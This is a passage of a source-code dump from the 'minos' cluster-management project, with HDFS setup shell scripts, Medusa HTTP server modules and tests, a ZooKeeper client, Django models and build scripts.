"text": "#!/bin/sh\n\nif [ $# -ne 2 ]; then\n echo \"Usage: `basename $0` user cluster\"\n exit 1\nfi\n\nkinit [email protected] || exit 2\n\nuser=$1\ncluster=$2\nHDFS=\"./deploy shell hdfs $cluster dfs\"\n\nset -x\n\nif [[ \"$user\" =~ hbase.* ]]; then\n $HDFS -mkdir -p /hbase\n $HDFS -chown $user /hbase\nelif [[ \"$user\" =~ yarn.* ]]; then\n $HDFS -mkdir -p /tmp/hadoop-yarn/staging/history\n $HDFS -chown $user:hadoop /tmp/hadoop-yarn\n $HDFS -chmod -R 777 /tmp/hadoop-yarn/staging\n $HDFS -chown $user:hadoop /tmp/hadoop-yarn/staging/history\n\n $HDFS -mkdir -p /var/log/hadoop-yarn\n $HDFS -chown $user:hadoop /var/log/hadoop-yarn\nelse\n $HDFS -mkdir -p /user/$user\n $HDFS -chown $user /user/$user\nfi\n\nkdestroy\n"
},
{
"alpha_fraction": 0.5071233510971069,
"alphanum_fraction": 0.5210669636726379,
"avg_line_length": 27.68695640563965,
"blob_id": "3527c4d232399f93269c0d1c5429178211f63ad1",
"content_id": "e09bd038d82003011100daaf468c9c23c275d3da",
"detected_licenses": [
"Apache-2.0",
"HPND",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3299,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 115,
"path": "/supervisor/supervisor/medusa/put_handler.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n#\n# Author: Sam Rushing <[email protected]>\n# Copyright 1996-2000 by Sam Rushing\n# All Rights Reserved.\n#\n\nRCS_ID = '$Id: put_handler.py,v 1.4 2002/08/01 18:15:45 akuchling Exp $'\n\nimport re\nimport string\n\nimport default_handler\nunquote = default_handler.unquote\nget_header = default_handler.get_header\n\nlast_request = None\n\nclass put_handler:\n def __init__ (self, filesystem, uri_regex):\n self.filesystem = filesystem\n if type (uri_regex) == type(''):\n self.uri_regex = re.compile (uri_regex)\n else:\n self.uri_regex = uri_regex\n\n def match (self, request):\n uri = request.uri\n if request.command == 'PUT':\n m = self.uri_regex.match (uri)\n if m and m.end() == len(uri):\n return 1\n return 0\n\n def handle_request (self, request):\n\n path, params, query, fragment = request.split_uri()\n\n # strip off leading slashes\n while path and path[0] == '/':\n path = path[1:]\n\n if '%' in path:\n path = unquote (path)\n\n # make sure there's a content-length header\n cl = get_header (CONTENT_LENGTH, request.header)\n if not cl:\n request.error (411)\n return\n else:\n cl = string.atoi (cl)\n\n # don't let the try to overwrite a directory\n if self.filesystem.isdir (path):\n request.error (405)\n return\n\n is_update = self.filesystem.isfile (path)\n\n try:\n output_file = self.filesystem.open (path, 'wb')\n except:\n request.error (405)\n return\n\n request.collector = put_collector (output_file, cl, request, is_update)\n\n # no terminator while receiving PUT data\n request.channel.set_terminator (None)\n\n # don't respond yet, wait until we've received the data...\n\nclass put_collector:\n def __init__ (self, file, length, request, is_update):\n self.file = file\n self.length = length\n self.request = request\n self.is_update = is_update\n self.bytes_in = 0\n\n def collect_incoming_data (self, data):\n ld = len(data)\n bi = self.bytes_in\n if (bi + ld) >= self.length:\n # last bit of data\n chunk = self.length - bi\n self.file.write (data[:chunk])\n self.file.close()\n\n if chunk != ld:\n print 'orphaned %d bytes: <%s>' % (ld - chunk, repr(data[chunk:]))\n\n # do some housekeeping\n r = self.request\n ch = r.channel\n ch.current_request = None\n # set the terminator back to the default\n ch.set_terminator ('\\r\\n\\r\\n')\n if self.is_update:\n r.reply_code = 204 # No content\n r.done()\n else:\n r.reply_now (201) # Created\n # avoid circular reference\n del self.request\n else:\n self.file.write (data)\n self.bytes_in = self.bytes_in + ld\n\n def found_terminator (self):\n # shouldn't be called\n pass\n\nCONTENT_LENGTH = re.compile ('Content-Length: ([0-9]+)', re.IGNORECASE)\n"
},
{
"alpha_fraction": 0.5426592826843262,
"alphanum_fraction": 0.5513850450515747,
"avg_line_length": 35.836734771728516,
"blob_id": "f54646505539aa00ff7c9a4e93b4fcdb014c3dae",
"content_id": "2c72437b61c42dd9fa8e4000dfda8cb39fe7191e",
"detected_licenses": [
"Apache-2.0",
"HPND",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7220,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 196,
"path": "/supervisor/supervisor/medusa/demo/start_medusa.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n#\n# Sample/Template Medusa Startup Script.\n#\n# This file acts as a configuration file and startup script for Medusa.\n#\n# You should make a copy of this file, then add, change or comment out\n# appropriately. Then you can start up the server by simply typing\n#\n# $ python start_medusa.py\n#\n\nimport os\nimport sys\n\nfrom supervisor.medusa import asyncore_25 as asyncore\nfrom supervisor.medusa import http_server\nfrom supervisor.medusa import ftp_server\nfrom supervisor.medusa import chat_server\nfrom supervisor.medusa import monitor\nfrom supervisor.medusa import filesys\nfrom supervisor.medusa import default_handler\nfrom supervisor.medusa import status_handler\nfrom supervisor.medusa import resolver\nfrom supervisor.medusa import logger\n\nif len(sys.argv) > 1:\n # process a few convenient arguments\n [HOSTNAME, IP_ADDRESS, PUBLISHING_ROOT] = sys.argv[1:]\nelse:\n HOSTNAME = 'www.nightmare.com'\n # This is the IP address of the network interface you want\n # your servers to be visible from. This can be changed to ''\n # to listen on all interfaces.\n IP_ADDRESS = '205.160.176.5'\n\n # Root of the http and ftp server's published filesystems.\n PUBLISHING_ROOT = '/home/www'\n\nHTTP_PORT = 8080 # The standard port is 80\nFTP_PORT = 8021 # The standard port is 21\nCHAT_PORT = 8888\nMONITOR_PORT = 9999\n\n# ===========================================================================\n# Caching DNS Resolver\n# ===========================================================================\n# The resolver is used to resolve incoming IP address (for logging),\n# and also to resolve hostnames for HTTP Proxy requests. I recommend\n# using a nameserver running on the local machine, but you can also\n# use a remote nameserver.\n\nrs = resolver.caching_resolver ('127.0.0.1')\n\n# ===========================================================================\n# Logging.\n# ===========================================================================\n\n# There are several types of logging objects. Multiple loggers may be combined,\n# See 'logger.py' for more details.\n\n# This will log to stdout:\nlg = logger.file_logger (sys.stdout)\n\n# This will log to syslog:\n#lg = logger.syslog_logger ('/dev/log')\n\n# This will wrap the logger so that it will\n# 1) keep track of the last 500 entries\n# 2) display an entry in the status report with a hyperlink\n# to view these log entries.\n#\n# If you decide to comment this out, be sure to remove the\n# logger object from the list of status objects below.\n#\n\nlg = status_handler.logger_for_status (lg)\n\n# ===========================================================================\n# Filesystem Object.\n# ===========================================================================\n# An abstraction for the file system. Filesystem objects can be\n# combined and implemented in interesting ways. The default type\n# simply remaps a directory to root.\n\nfs = filesys.os_filesystem (PUBLISHING_ROOT)\n\n# ===========================================================================\n# Default HTTP handler\n# ===========================================================================\n\n# The 'default' handler for the HTTP server is one that delivers\n# files normally - this is the expected behavior of a web server.\n# Note that you needn't use it: Your web server might not want to\n# deliver files!\n\n# This default handler uses the filesystem object we just constructed.\n\ndh = default_handler.default_handler (fs)\n\n# ===========================================================================\n# HTTP Server\n# ===========================================================================\nhs = http_server.http_server (IP_ADDRESS, HTTP_PORT, rs, lg)\n\n# Here we install the default handler created above.\nhs.install_handler (dh)\n\n# ===========================================================================\n# Unix user `public_html' directory support\n# ===========================================================================\nif os.name == 'posix':\n from supervisor.medusa import unix_user_handler\n uh = unix_user_handler.unix_user_handler ('public_html')\n hs.install_handler (uh)\n\n# ===========================================================================\n# FTP Server\n# ===========================================================================\n\n# Here we create an 'anonymous' ftp server.\n# Note: the ftp server is read-only by default. [in this mode, all\n# 'write-capable' commands are unavailable]\n\nftp = ftp_server.ftp_server (\n ftp_server.anon_authorizer (\n PUBLISHING_ROOT\n ),\n ip=IP_ADDRESS,\n port=FTP_PORT,\n resolver=rs,\n logger_object=lg\n )\n\n# ===========================================================================\n# Monitor Server:\n# ===========================================================================\n\n# This creates a secure monitor server, binding to the loopback\n# address on port 9999, with password 'fnord'. The monitor server\n# can be used to examine and control the server while it is running.\n# If you wish to access the server from another machine, you will\n# need to use '' or some other IP instead of '127.0.0.1'.\nms = monitor.secure_monitor_server ('fnord', '127.0.0.1', MONITOR_PORT)\n\n# ===========================================================================\n# Chat Server\n# ===========================================================================\n\n# The chat server is a simple IRC-like server: It is meant as a\n# demonstration of how to write new servers and plug them into medusa.\n# It's a very simple server (it took about 2 hours to write), but it\n# could be easily extended. For example, it could be integrated with\n# the web server, perhaps providing navigational tools to browse\n# through a series of discussion groups, listing the number of current\n# users, authentication, etc...\n\ncs = chat_server.chat_server (IP_ADDRESS, CHAT_PORT)\n\n# ===========================================================================\n# Status Handler\n# ===========================================================================\n\n# These are objects that can report their status via the HTTP server.\n# You may comment out any of these, or add more of your own. The only\n# requirement for a 'status-reporting' object is that it have a method\n# 'status' that will return a producer, which will generate an HTML\n# description of the status of the object.\n\nstatus_objects = [\n hs,\n ftp,\n ms,\n cs,\n rs,\n lg\n ]\n\n# Create a status handler. By default it binds to the URI '/status'...\nsh = status_handler.status_extension(status_objects)\n# ... and install it on the web server.\nhs.install_handler (sh)\n\n# become 'nobody'\nif os.name == 'posix':\n if hasattr (os, 'seteuid'):\n import pwd\n [uid, gid] = pwd.getpwnam ('nobody')[2:4]\n os.setegid (gid)\n os.seteuid (uid)\n\n# Finally, start up the server loop! This loop will not exit until\n# all clients and servers are closed. You may cleanly shut the system\n# down by sending SIGINT (a.k.a. KeyboardInterrupt).\nasyncore.loop()\n"
},
{
"alpha_fraction": 0.5509054064750671,
"alphanum_fraction": 0.5605633854866028,
"avg_line_length": 31.697368621826172,
"blob_id": "54da2729b68a03c371db85eb985df7c1a4ea61f6",
"content_id": "914ebfdcdae30c51bbd7327396a64c4d2b122f4e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2485,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 76,
"path": "/owl/zktree/models.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\nimport threading\nimport zookeeper\n\nPERM_READ = 1\nPERM_WRITE = 2\nPERM_CREATE = 4\nPERM_DELETE = 8\nPERM_ADMIN = 16\nPERM_ALL = PERM_READ | PERM_WRITE | PERM_CREATE | PERM_DELETE | PERM_ADMIN\n\nzookeeper.set_log_stream(open(\"cli_log.txt\",\"w\"))\n\nTIMEOUT = 10.0\n\nclass ZKClient(object):\n def __init__(self, servers, timeout):\n self.connected = False\n self.conn_cv = threading.Condition( )\n self.handle = -1\n\n self.conn_cv.acquire()\n self.handle = zookeeper.init(servers, self.connection_watcher, 30000)\n self.conn_cv.wait(timeout)\n self.conn_cv.release()\n\n if not self.connected:\n raise Exception(\"Unable to connect to %s\" % (servers))\n\n def connection_watcher(self, h, type, state, path):\n self.handle = h\n self.conn_cv.acquire()\n self.connected = True\n self.conn_cv.notifyAll()\n self.conn_cv.release()\n\n def close(self):\n zookeeper.close(self.handle)\n\n def get(self, path, watcher=None):\n return zookeeper.get(self.handle, path, watcher)\n\n def get_children(self, path, watcher=None):\n return zookeeper.get_children(self.handle, path, watcher)\n\n def get_acls(self, path):\n return zookeeper.get_acl(self.handle, path)\n\nclass ZNode(object):\n def __init__(self, addrs, path=\"/\"):\n self.path = path\n zk = ZKClient(addrs, TIMEOUT)\n try:\n self.data, self.stat = zk.get(path)\n self.stat['ctime'] = datetime.fromtimestamp(self.stat['ctime']/1000)\n self.stat['mtime'] = datetime.fromtimestamp(self.stat['mtime']/1000)\n self.children = zk.get_children(path) or []\n self.acls = zk.get_acls(path)[1] or []\n for acl in self.acls:\n perms = acl['perms']\n perms_list = []\n if perms & PERM_READ:\n perms_list.append(\"PERM_READ\")\n if perms & PERM_WRITE:\n perms_list.append(\"PERM_WRITE\")\n if perms & PERM_CREATE:\n perms_list.append(\"PERM_CREATE\")\n if perms & PERM_DELETE:\n perms_list.append(\"PERM_DELETE\")\n if perms & PERM_ADMIN:\n perms_list.append(\"PERM_ADMIN\")\n if perms & PERM_ALL == PERM_ALL:\n perms_list = [\"PERM_ALL\"]\n acl['perm_list'] = perms_list\n finally:\n zk.close()\n"
},
{
"alpha_fraction": 0.6353729963302612,
"alphanum_fraction": 0.6663872599601746,
"avg_line_length": 21.50943374633789,
"blob_id": "03aecad35b61c8a5353c1a4e3ed5d66677f54813",
"content_id": "06bf16a355a09b0ec03182538232eef4d60f3764",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1193,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 53,
"path": "/client/log.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import sys\nimport threading\n\nfrom datetime import datetime\n\nmutex = threading.Lock()\n\nclass Log:\n # We have such a agreement on verbosity level:\n # 0: equals to print_info\n # 1: summary of a host level operation (a batch of command)\n # 2: summary of a command\n # 3: details or content of a command\n verbosity = 0\n\n @staticmethod\n def _print(message):\n mutex.acquire(1)\n print \"%s %s\" % (datetime.now().strftime('%Y-%m-%d %H:%M:%S'), message)\n mutex.release()\n\n @staticmethod\n def error_exit(print_stack):\n if not print_stack:\n sys.exit(2)\n else:\n raise RuntimeError(\"fatal error\")\n\n @staticmethod\n def print_verbose(message, verbosity):\n if verbosity <= Log.verbosity:\n Log.print_info(message)\n\n @staticmethod\n def print_info(message):\n Log._print(message)\n\n @staticmethod\n def print_success(message):\n Log._print(\"\\033[0;32m%s\\033[0m\" % message)\n\n @staticmethod\n def print_warning(message):\n Log._print(\"\\033[0;33m%s\\033[0m\" % message)\n\n @staticmethod\n def print_error(message):\n Log._print(\"\\033[0;31m%s\\033[0m\" % message)\n\n @staticmethod\n def print_critical(message):\n Log.print_error(message)\n Log.error_exit(False)\n"
},
{
"alpha_fraction": 0.7217391133308411,
"alphanum_fraction": 0.7356521487236023,
"avg_line_length": 30.77777862548828,
"blob_id": "57f6efb34e333c104be1b77088de79cd88731f81",
"content_id": "70de993f4868ff993f82c2744d9d5ec2905e4884",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 575,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 18,
"path": "/owl/failover_framework/models.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom django.db import models\n\nclass Task(models.Model):\n start_timestamp =models.BigIntegerField(primary_key=True)\n start_time = models.CharField(max_length=64)\n action_number = models.IntegerField()\n cluster_healthy = models.BooleanField()\n data_consistent = models.BooleanField()\n success = models.BooleanField()\n \nclass Action(models.Model):\n task = models.ForeignKey(Task)\n start_time = models.CharField(max_length=64)\n name = models.CharField(max_length=256)\n success = models.BooleanField()\n consume_time = models.IntegerField()\n \n"
},
{
"alpha_fraction": 0.6205733418464661,
"alphanum_fraction": 0.6323777437210083,
"avg_line_length": 30.210525512695312,
"blob_id": "fa2cce58b086ceae26d86b718718df7c1aa50f74",
"content_id": "1a5c61af76d5cad67528b61ac53bd08e2a84f7ad",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1186,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 38,
"path": "/tank/package_server/models.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom django.db import models\nfrom tank.settings import MEDIA_URL\n\n# Create your models here.\n\ndef get_upload_path(instance, filename):\n return '%s/%s-%s/%s' % (instance.artifact, instance.revision,\n instance.timestamp, instance.name)\n\nclass Package(models.Model):\n artifact = models.CharField(max_length=128)\n name = models.CharField(max_length=256)\n revision = models.CharField(max_length=64)\n timestamp = models.CharField(max_length=128)\n checksum = models.CharField(max_length=128)\n file = models.FileField(upload_to=get_upload_path)\n\n def __unicode__(self):\n return u'%s %s %s %s %s' % (self.artifact, self.revision,\n self.timestamp, self.name, self.checksum)\n\n def __str__(self):\n field_json_str = \"{\" \\\n \"'artifact': '%s',\" \\\n \"'package_name': '%s',\" \\\n \"'revision': '%s',\" \\\n \"'timestamp': '%s',\" \\\n \"'checksum': '%s'\" \\\n \"}\" % (\n self.artifact, self.name,\n self.revision, self.timestamp,\n self.checksum)\n return field_json_str\n\n def download_link(self):\n return '%s/%s/%s-%s/%s' % (MEDIA_URL.rstrip('/'), self.artifact,\n self.revision, self.timestamp, self.name)\n"
},
{
"alpha_fraction": 0.5629138946533203,
"alphanum_fraction": 0.5728476643562317,
"avg_line_length": 29.200000762939453,
"blob_id": "74863257e924fd0eff6cf1cb98b0c1afc82ad976",
"content_id": "1e52d8d39e87e826c329af9d3da71202d6a1213f",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3322,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 110,
"path": "/supervisor/supervisor/medusa/test/test_11.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\nimport socket\nimport string\nfrom supervisor.medusa import asyncore_25 as asyncore\nfrom supervisor.medusa import asynchat_25 as asynchat\n\n# get some performance figures for an HTTP/1.1 server.\n# use pipelining.\n\nclass test_client (asynchat.async_chat):\n\n ac_in_buffer_size = 16384\n ac_out_buffer_size = 16384\n\n total_in = 0\n\n concurrent = 0\n max_concurrent = 0\n\n def __init__ (self, addr, chain):\n asynchat.async_chat.__init__ (self)\n self.create_socket (socket.AF_INET, socket.SOCK_STREAM)\n self.set_terminator ('\\r\\n\\r\\n')\n self.connect (addr)\n self.push (chain)\n\n def handle_connect (self):\n test_client.concurrent = test_client.concurrent + 1\n if (test_client.concurrent > test_client.max_concurrent):\n test_client.max_concurrent = test_client.concurrent\n\n def handle_expt (self):\n print 'unexpected FD_EXPT thrown. closing()'\n self.close()\n\n def close (self):\n test_client.concurrent = test_client.concurrent - 1\n asynchat.async_chat.close(self)\n\n def collect_incoming_data (self, data):\n test_client.total_in = test_client.total_in + len(data)\n\n def found_terminator (self):\n pass\n\n def log (self, *args):\n pass\n\n\nimport time\n\nclass timer:\n def __init__ (self):\n self.start = time.time()\n\n def end (self):\n return time.time() - self.start\n\ndef build_request_chain (num, host, request_size):\n s = 'GET /test%d.html HTTP/1.1\\r\\nHost: %s\\r\\n\\r\\n' % (request_size, host)\n sl = [s] * (num-1)\n sl.append (\n 'GET /test%d.html HTTP/1.1\\r\\nHost: %s\\r\\nConnection: close\\r\\n\\r\\n' % (\n request_size, host\n )\n )\n return string.join (sl, '')\n\nif __name__ == '__main__':\n import string\n import sys\n if len(sys.argv) != 6:\n print 'usage: %s <host> <port> <request-size> <num-requests> <num-connections>\\n' % sys.argv[0]\n else:\n host = sys.argv[1]\n\n ip = socket.gethostbyname (host)\n\n [port, request_size, num_requests, num_conns] = map (\n string.atoi, sys.argv[2:]\n )\n\n chain = build_request_chain (num_requests, host, request_size)\n\n t = timer()\n for i in range (num_conns):\n test_client ((host,port), chain)\n asyncore.loop()\n total_time = t.end()\n\n # ok, now do some numbers\n total_bytes = test_client.total_in\n num_trans = num_requests * num_conns\n throughput = float (total_bytes) / total_time\n trans_per_sec = num_trans / total_time\n\n sys.stderr.write ('total time: %.2f\\n' % total_time)\n sys.stderr.write ('number of transactions: %d\\n' % num_trans)\n sys.stderr.write ('total bytes sent: %d\\n' % total_bytes)\n sys.stderr.write ('total throughput (bytes/sec): %.2f\\n' % throughput)\n sys.stderr.write ('transactions/second: %.2f\\n' % trans_per_sec)\n sys.stderr.write ('max concurrent connections: %d\\n' % test_client.max_concurrent)\n\n sys.stdout.write (\n string.join (\n map (str, (num_conns, num_requests, request_size, throughput, trans_per_sec)),\n ','\n ) + '\\n'\n )\n"
},
{
"alpha_fraction": 0.5454308390617371,
"alphanum_fraction": 0.5718015432357788,
"avg_line_length": 28.689922332763672,
"blob_id": "a33f15e66158370d3486ac1331e817b6a4e0de19",
"content_id": "01a681ce0ab5e45d961f4fe16becf66b9a428d77",
"detected_licenses": [
"Apache-2.0",
"HPND",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3830,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 129,
"path": "/supervisor/supervisor/medusa/test/test_producers.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#\n# Test script for producers.py\n#\n\n__revision__ = \"$Id: test_producers.py,v 1.2 2002/09/18 20:16:40 akuchling Exp $\"\n\nimport StringIO, zlib\nfrom sancho.unittest import TestScenario, parse_args, run_scenarios\n\ntested_modules = [\"supervisor.medusa.producers\"]\n\n\nfrom supervisor.medusa import producers\n\ntest_string = ''\nfor i in range(16385):\n test_string += chr(48 + (i%10))\n\nclass ProducerTest (TestScenario):\n\n def setup (self):\n pass\n \n def shutdown (self):\n pass\n\n def _check_all (self, p, expected_string):\n # Check that a producer returns all of the string,\n # and that it's the unchanged string.\n count = 0\n data = \"\"\n while 1:\n s = p.more()\n if s == \"\":\n break\n count += len(s)\n data += s\n self.test_val('count', len(expected_string))\n self.test_val('data', expected_string)\n self.test_val('p.more()', '')\n return data\n \n def check_simple (self):\n p = producers.simple_producer(test_string)\n self.test_val('p.more()', test_string[:1024])\n\n p = producers.simple_producer(test_string, buffer_size = 5)\n self._check_all(p, test_string)\n\n def check_scanning (self):\n p = producers.scanning_producer(test_string)\n self.test_val('p.more()', test_string[:1024])\n\n p = producers.scanning_producer(test_string, buffer_size = 5)\n self._check_all(p, test_string)\n\n def check_lines (self):\n p = producers.lines_producer(['a']* 65)\n self._check_all(p, 'a\\r\\n'*65)\n\n def check_buffer (self):\n p = producers.buffer_list_producer(['a']* 1027)\n self._check_all(p, 'a'*1027)\n\n def check_file (self):\n f = StringIO.StringIO(test_string)\n p = producers.file_producer(f)\n self._check_all(p, test_string)\n\n def check_output (self):\n p = producers.output_producer()\n for i in range(0,66):\n p.write('a')\n for i in range(0,65):\n p.write('b\\n')\n self._check_all(p, 'a'*66 + 'b\\r\\n'*65)\n\n def check_composite (self):\n p1 = producers.simple_producer('a'*66, buffer_size = 5)\n p2 = producers.lines_producer(['b']*65)\n p = producers.composite_producer([p1, p2])\n self._check_all(p, 'a'*66 + 'b\\r\\n'*65)\n\n def check_glob (self):\n p1 = producers.simple_producer(test_string, buffer_size = 5)\n p = producers.globbing_producer(p1, buffer_size = 1024)\n self.test_true('1024 <= len(p.more())')\n\n def check_hooked (self):\n def f (num_bytes):\n self.test_val('num_bytes', len(test_string))\n p1 = producers.simple_producer(test_string, buffer_size = 5)\n p = producers.hooked_producer(p1, f)\n self._check_all(p, test_string)\n\n def check_chunked (self):\n p1 = producers.simple_producer('the quick brown fox', buffer_size = 5)\n p = producers.chunked_producer(p1, footers=['FOOTER'])\n self._check_all(p, \"\"\"5\\r\nthe q\\r\n5\\r\nuick \\r\n5\\r\nbrown\\r\n4\\r\n fox\\r\n0\\r\nFOOTER\\r\n\\r\\n\"\"\")\n\n def check_compressed (self):\n p1 = producers.simple_producer(test_string, buffer_size = 5)\n p = producers.compressed_producer(p1)\n compr_data = self._check_all(p, zlib.compress(test_string, 5))\n self.test_val('zlib.decompress(compr_data)', test_string)\n\n def check_escaping (self):\n p1 = producers.simple_producer('the quick brown fox', buffer_size = 5)\n p = producers.escaping_producer(p1,\n esc_from = ' ',\n esc_to = '_')\n self._check_all(p, 'the_quick_brown_fox')\n \n# class ProducerTest\n\n\nif __name__ == \"__main__\":\n (scenarios, options) = parse_args()\n run_scenarios(scenarios, options)\n"
},
{
"alpha_fraction": 0.7248085141181946,
"alphanum_fraction": 0.7248085141181946,
"avg_line_length": 32.27450942993164,
"blob_id": "101538d5264f55afaebb68abd9c419ca51f6c2dc",
"content_id": "d90081dee23755c80327f816d8f2044849c6c787",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1697,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 51,
"path": "/build/build_tank.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import os\n\nimport build_utils\n\nfrom build_utils import MINOS_ROOT\n\nfrom minos_config import Log\nfrom minos_config import TANK_DEFAULT_IP\nfrom minos_config import TANK_DEFAULT_PORT\nfrom minos_config import TANK_PREREQUISITE_PYTHON_LIBS\n\nSTOP_PROCESS_SCRIPT = os.getenv(\"STOP_PROCESS_SCRIPT\")\nTANK_ROOT = os.getenv(\"TANK_ROOT\")\nTANK_PID_FILE = os.getenv(\"TANK_PID_FILE\")\n\ndef _build(args):\n Log.print_info(\"Building tank server\")\n\n # Check and install prerequisite python libraries\n Log.print_info(\"Check and install prerequisite python libraries\")\n build_utils.check_and_install_modules(TANK_PREREQUISITE_PYTHON_LIBS)\n\n # Output build information\n if args.tank_ip != TANK_DEFAULT_IP or args.tank_port != TANK_DEFAULT_PORT:\n build_utils.output_build_info(args.component, 'tank_ip', args.tank_ip)\n build_utils.output_build_info(args.component, 'tank_port', args.tank_port)\n\n build_utils.output_build_info(args.component, 'build_status', 'success')\n Log.print_info(\"The component %s is built successfully\" % args.component)\n\ndef _do_start(args):\n tank_ip = build_utils.get_build_info_option('tank', 'tank_ip')\n tank_port = build_utils.get_build_info_option('tank', 'tank_port')\n if tank_ip and tank_port:\n args.tank_ip = tank_ip\n args.tank_port = int(tank_port)\n\n build_utils.start_daemon_process('Tank server', TANK_PID_FILE,\n TANK_ROOT, './start_tank.sh', args.tank_ip, str(args.tank_port))\n\ndef _do_stop():\n build_utils.stop_daemon_process('Tank server', TANK_PID_FILE,\n TANK_ROOT, STOP_PROCESS_SCRIPT)\n\ndef start(args):\n if not build_utils.get_build_info_option('tank', 'build_status') == 'success':\n _build(args)\n _do_start(args)\n\ndef stop(args):\n _do_stop()\n"
},
{
"alpha_fraction": 0.6241135001182556,
"alphanum_fraction": 0.6276595592498779,
"avg_line_length": 17.19354820251465,
"blob_id": "3e50fb6ee58681b742cd08bedef2be6ad881067d",
"content_id": "9d8a225e9ef7bf8b8c5898a2e5dace5bf281dd07",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 564,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 31,
"path": "/config/template/cleanup_hdfs.sh.tmpl",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\njob_name=\"%job_name\"\nha_status=\"%ha_status\"\n\nif [ $job_name != \"zkfc\" ] || [ $ha_status != \"active\" ]; then\n exit 0\nfi\n\n# Only job zkfc need to cleanup zk\nartifact=\"%artifact\"\n\nrun_dir=`dirname \"$0\"`\nrun_dir=`cd \"$run_dir\"; pwd`\n\npackage_dir=\"$run_dir/package\"\nlog_dir=\"$run_dir/log\"\npid_file=\"$run_dir/${job_name}.pid\"\noutput_file=\"$run_dir/${job_name}.out\"\n\njar_dirs=\"%jar_dirs\"\nparams=\"%params\"\n\nclass_path=\"$run_dir/:$jar_dirs\"\n\njava=\"/opt/soft/jdk/bin/java\"\nif ! [ -e $java ]; then\n java=\"/usr/bin/java\"\nfi\n\nexec $java -cp $class_path $params $@\n"
},
{
"alpha_fraction": 0.5747374296188354,
"alphanum_fraction": 0.5882036089897156,
"avg_line_length": 28.70400047302246,
"blob_id": "f866ec4e9722164443877037af2bd5673cfc8191",
"content_id": "6dab086b3ceb0c5a9ecbe901b8d6321eb42dbf82",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3713,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 125,
"path": "/supervisor/supervisor/medusa/thread/thread_channel.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\nVERSION_STRING = \"$Id: thread_channel.py,v 1.3 2002/03/19 22:49:40 amk Exp $\"\n\n# This will probably only work on Unix.\n\n# The disadvantage to this technique is that it wastes file\n# descriptors (especially when compared to select_trigger.py)\n\n# May be possible to do it on Win32, using TCP localhost sockets.\n# [does winsock support 'socketpair'?]\n\nimport asyncore_25 as asyncore\nimport asynchat_25 as asynchat\n\nimport fcntl\nimport FCNTL\nimport os\nimport socket\nimport string\nimport thread\n\n# this channel slaves off of another one. it starts a thread which\n# pumps its output through the 'write' side of the pipe. The 'read'\n# side of the pipe will then notify us when data is ready. We push\n# this data on the owning data channel's output queue.\n\nclass thread_channel (asyncore.file_dispatcher):\n\n buffer_size = 8192\n\n def __init__ (self, channel, function, *args):\n self.parent = channel\n self.function = function\n self.args = args\n self.pipe = rfd, wfd = os.pipe()\n asyncore.file_dispatcher.__init__ (self, rfd)\n\n def start (self):\n rfd, wfd = self.pipe\n\n # The read side of the pipe is set to non-blocking I/O; it is\n # 'owned' by medusa.\n\n flags = fcntl.fcntl (rfd, FCNTL.F_GETFL, 0)\n fcntl.fcntl (rfd, FCNTL.F_SETFL, flags | FCNTL.O_NDELAY)\n\n # The write side of the pipe is left in blocking mode; it is\n # 'owned' by the thread. However, we wrap it up as a file object.\n # [who wants to 'write()' to a number?]\n\n of = os.fdopen (wfd, 'w')\n\n thread.start_new_thread (\n self.function,\n # put the output file in front of the other arguments\n (of,) + self.args\n )\n\n def writable (self):\n return 0\n\n def readable 